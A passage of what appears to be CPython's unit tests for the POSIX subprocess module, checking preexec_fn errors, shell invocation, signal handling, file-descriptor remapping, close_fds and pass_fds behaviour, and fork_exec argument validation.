self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
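        # Duplicate each requested fd and remember its inheritable flag so
        # that _restore_fds() can later dup2() the saved copy back into place.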
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
            # The pure Python implementation keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
        # +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
        # Leave two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = import_helper.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
False, [], 0, -1,
func)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
                # from passing the test. It would be ideal to refactor this to
                # start with a valid *args list, confirm that a good call with
                # it works, and then mutate it in various ways to ensure that
                # bad calls with individual arg type errors each raise a
                # TypeError. Saving that for a future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
None, None, None, -1,
None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
